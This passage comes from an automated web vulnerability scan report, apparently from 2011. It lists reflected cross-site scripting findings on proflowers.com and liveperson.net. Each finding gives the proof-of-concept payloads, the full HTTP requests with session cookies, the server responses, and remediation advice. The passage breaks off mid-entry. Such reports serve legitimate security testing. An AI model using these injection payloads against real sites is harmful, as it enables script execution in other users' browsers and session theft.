Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX,NFX; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:16:38 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253ACategory%25253Aproductgroup%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fproducts.proflowers.com%25252Fflowers%25252FDeluxe-Succulent-Garden-30008396%25253Fviewpos%25253D1%252526trackingpgroup%25253DPBS%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:16:38 AM?30008396&5/9/2011 5:31:55 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:31:55 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:31:56 GMT
Content-Length: 137304


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
arden");
           s.prop1 = cleanString("PFC:Product:30008396-DeluxeSucculentGarden");
           if ( "" != "" ) {
               s.prop33 = "captured";
           }
           else {
               s.prop33 = "no zip code";
           }

           if ( "PBS38208\\";alert(1)//9789dc0b2fb" == "MerchCartDefault" ) {
                s.eVar6=cleanString("_:30008396_");
           }
           else if ( "PBS38208\\";alert(1)//9789dc0b2fb" == "MerchCart" ) {
                s.eVar6=cleanString("_:30008396_");
           }
           
...[SNIP]...

4.187. http://products.proflowers.com/flowers/Deluxe-Succulent-Garden-30008396 [viewpos parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/Deluxe-Succulent-Garden-30008396

Issue detail

The value of the viewpos request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 42874\"%3balert(1)//eb3bd423121 was submitted in the viewpos parameter. This input was echoed as 42874\\";alert(1)//eb3bd423121 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /flowers/Deluxe-Succulent-Garden-30008396?viewpos=142874\"%3balert(1)//eb3bd423121&trackingpgroup=PBS&tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&Ref=HomeNoRef HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA1abf9\%22%3balert(1)//e408dc57373&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX,NFX; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:16:38 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253ACategory%25253Aproductgroup%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fproducts.proflowers.com%25252Fflowers%25252FDeluxe-Succulent-Garden-30008396%25253Fviewpos%25253D1%252526trackingpgroup%25253DPBS%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:16:38 AM?30008396&5/9/2011 5:29:45 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:29:45 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:29:45 GMT
Content-Length: 138703


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
3_";
           }
           s.eVar37=cleanString("PFC:Product:30008396_Deluxe Succulent Garden");
           s.eVar51="PBS";
           s.events = "prodView,event5,event22,event23";
           s.products=";30008396;;;event5=1|event22=142874\\";alert(1)//eb3bd423121|event23=0.00";
       }

   </script>
...[SNIP]...

4.188. http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767 [Ref parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/The-Ultimate-Office-Plant-30003767

Issue detail

The value of the Ref request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c82dd\"%3balert(1)//0a10d56d3ce was submitted in the Ref parameter. This input was echoed as c82dd\\";alert(1)//0a10d56d3ce in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /flowers/The-Ultimate-Office-Plant-30003767?viewpos=6&trackingpgroup=PBS&tile=hmpg_podA&Ref=HomeNoRefc82dd\"%3balert(1)//0a10d56d3ce HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253ACategory%25253APBS%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fproducts.proflowers.com%25252Fflowers%25252FThe-Ultimate-Office-Plant-30003767%25253Fviewpos%25253D6%252526trackingpgroup%25253DP%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM?30003767&5/9/2011 5:27:58 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:27:58 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:27:57 GMT
Content-Length: 146906


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
ndarOnZipEntry=ReloadCalendarOnZipEntry_in;this.ShowSummaryZipPanel=ShowSummaryZipPanel_in;};this.Rows = new Array(1);this.Rows[0]=new this.Row("30003767","30003767","30003767","168084","27","HomeNoRefc82dd\\";alert(1)//0a10d56d3ce","","PFC","1",0,"",1,"xpa-1,pxc-1,xpb-1,prh-1,zzd-2,pku-1,phl-2,zze-1,pfl-0,pxa-2,pvo-2,pmt-3,pfb-0,pxb-1,pec-3,mpsmediapersonalitysplit-2,pkt-1,ntd-2,pbo-5,nte-2,pkv-2,ntc-1,ppv-3,apg-1,phr-2,zzf-2,n
...[SNIP]...

4.189. http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767 [tile parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/The-Ultimate-Office-Plant-30003767

Issue detail

The value of the tile request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 221e8\"%3balert(1)//f195e3e5061 was submitted in the tile parameter. This input was echoed as 221e8\\";alert(1)//f195e3e5061 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /flowers/The-Ultimate-Office-Plant-30003767?viewpos=6&trackingpgroup=PBS&tile=hmpg_podA221e8\"%3balert(1)//f195e3e5061&Ref=HomeNoRef HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253ACategory%25253APBS%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fproducts.proflowers.com%25252Fflowers%25252FThe-Ultimate-Office-Plant-30003767%25253Fviewpos%25253D6%252526trackingpgroup%25253DP%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM?30003767&5/9/2011 5:26:08 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:26:08 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:26:08 GMT
Content-Length: 146314


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
_leftpod" || "" == "hmpgB_leftpod" || "" == "hmpg_leftpod" ) {
               s.eVar20="_";
           }
           else if ("" == "ProductSearch" || "" == "ProductSearchFeature") {
               s.eVar20="";
           }
           if ("hmpg_podA221e8\\";alert(1)//f195e3e5061" != "")
           {
               s.eVar20="PFC_hmpg_podA221e8\\";alert(1)//f195e3e5061_";
           }
           s.eVar37=cleanString("PFC:Product:30003767_The Ultimate Office Plant");
           s.eVar51="PBS";
           s.events = "prodVi
...[SNIP]...

4.190. http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767 [trackingpgroup parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/The-Ultimate-Office-Plant-30003767

Issue detail

The value of the trackingpgroup request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 83ea7\"%3balert(1)//17cc815a216 was submitted in the trackingpgroup parameter. This input was echoed as 83ea7\\";alert(1)//17cc815a216 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /flowers/The-Ultimate-Office-Plant-30003767?viewpos=6&trackingpgroup=PBS83ea7\"%3balert(1)//17cc815a216&tile=hmpg_podA&Ref=HomeNoRef HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253ACategory%25253APBS%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fproducts.proflowers.com%25252Fflowers%25252FThe-Ultimate-Office-Plant-30003767%25253Fviewpos%25253D6%252526trackingpgroup%25253DP%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM?30003767&5/9/2011 5:23:30 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:23:30 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:23:29 GMT
Content-Length: 141553


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
lant");
           s.prop1 = cleanString("PFC:Product:30003767-TheUltimateOfficePlant");
           if ( "" != "" ) {
               s.prop33 = "captured";
           }
           else {
               s.prop33 = "no zip code";
           }

           if ( "PBS83ea7\\";alert(1)//17cc815a216" == "MerchCartDefault" ) {
                s.eVar6=cleanString("_:30003767_");
           }
           else if ( "PBS83ea7\\";alert(1)//17cc815a216" == "MerchCart" ) {
                s.eVar6=cleanString("_:30003767_");
           }
           
...[SNIP]...

4.191. http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767 [viewpos parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/The-Ultimate-Office-Plant-30003767

Issue detail

The value of the viewpos request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ff98b\"%3balert(1)//1f7c8e9547f was submitted in the viewpos parameter. This input was echoed as ff98b\\";alert(1)//1f7c8e9547f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /flowers/The-Ultimate-Office-Plant-30003767?viewpos=6ff98b\"%3balert(1)//1f7c8e9547f&trackingpgroup=PBS&tile=hmpg_podA&Ref=HomeNoRef HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253ACategory%25253APBS%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fproducts.proflowers.com%25252Fflowers%25252FThe-Ultimate-Office-Plant-30003767%25253Fviewpos%25253D6%252526trackingpgroup%25253DP%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM?30003767&5/9/2011 5:20:39 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:20:39 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:20:39 GMT
Content-Length: 141634


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
";
           }
           s.eVar37=cleanString("PFC:Product:30003767_The Ultimate Office Plant");
           s.eVar51="PBS";
           s.events = "prodView,event5,event22,event23";
           s.products=";30003767;;;event5=1|event22=6ff98b\\";alert(1)//1f7c8e9547f|event23=0.00";
       }

   </script>
...[SNIP]...

4.192. http://sales.liveperson.net/hc/87011923/ [msessionkey parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /hc/87011923/

Issue detail

The value of the msessionkey request parameter is copied into the HTML document as plain text between tags. The payload 6c30f<img%20src%3da%20onerror%3dalert(1)>94c74c754a7 was submitted in the msessionkey parameter. This input was echoed as 6c30f<img src=a onerror=alert(1)>94c74c754a7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /hc/87011923/?&visitor=16601209214853&msessionkey=25522835487083372716c30f<img%20src%3da%20onerror%3dalert(1)>94c74c754a7&siteContainer=STANDALONE&site=87011923&cmd=mTagKnockPage&lpCallId=264594832202-36202526651&protV=20&lpjson=1&id=384168620&javaSupport=true&visitorStatus=INSITE_STATUS HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/product.do?baseCode=91637&dataset=10305&cm_cid=d10305
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=16601209214853,d=1303177644; _mkto_trk=id:220-ESA-932&token:_mch-liveperson.net-1304643823223-44198

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:11:51 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Mon, 09 May 2011 01:11:51 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 2960

lpConnLib.Process({"ResultSet": {"lpCallId":"264594832202-36202526651","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'sales.liveperson.ne
...[SNIP]...
code_id": "FPCookie", "js_code": "lpMTagConfig.FPC_VID_NAME='87011923-VID'; lpMTagConfig.FPC_VID='16601209214853'; lpMTagConfig.FPC_SKEY_NAME='87011923-SKEY'; lpMTagConfig.FPC_SKEY='25522835487083372716c30f<img src=a onerror=alert(1)>94c74c754a7';lpMTagConfig.FPC_CONT_NAME='HumanClickSiteContainerID_87011923'; lpMTagConfig.FPC_CONT='STANDALONE'"},{"code_id": "SYSTEM!firstpartycookies_compact.js", "js_code": "function lpFirstPartyCookieSupport
...[SNIP]...

4.193. http://www.proflowers.com/house-plants-PBS [tile parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.proflowers.com
Path:   /house-plants-PBS

Issue detail

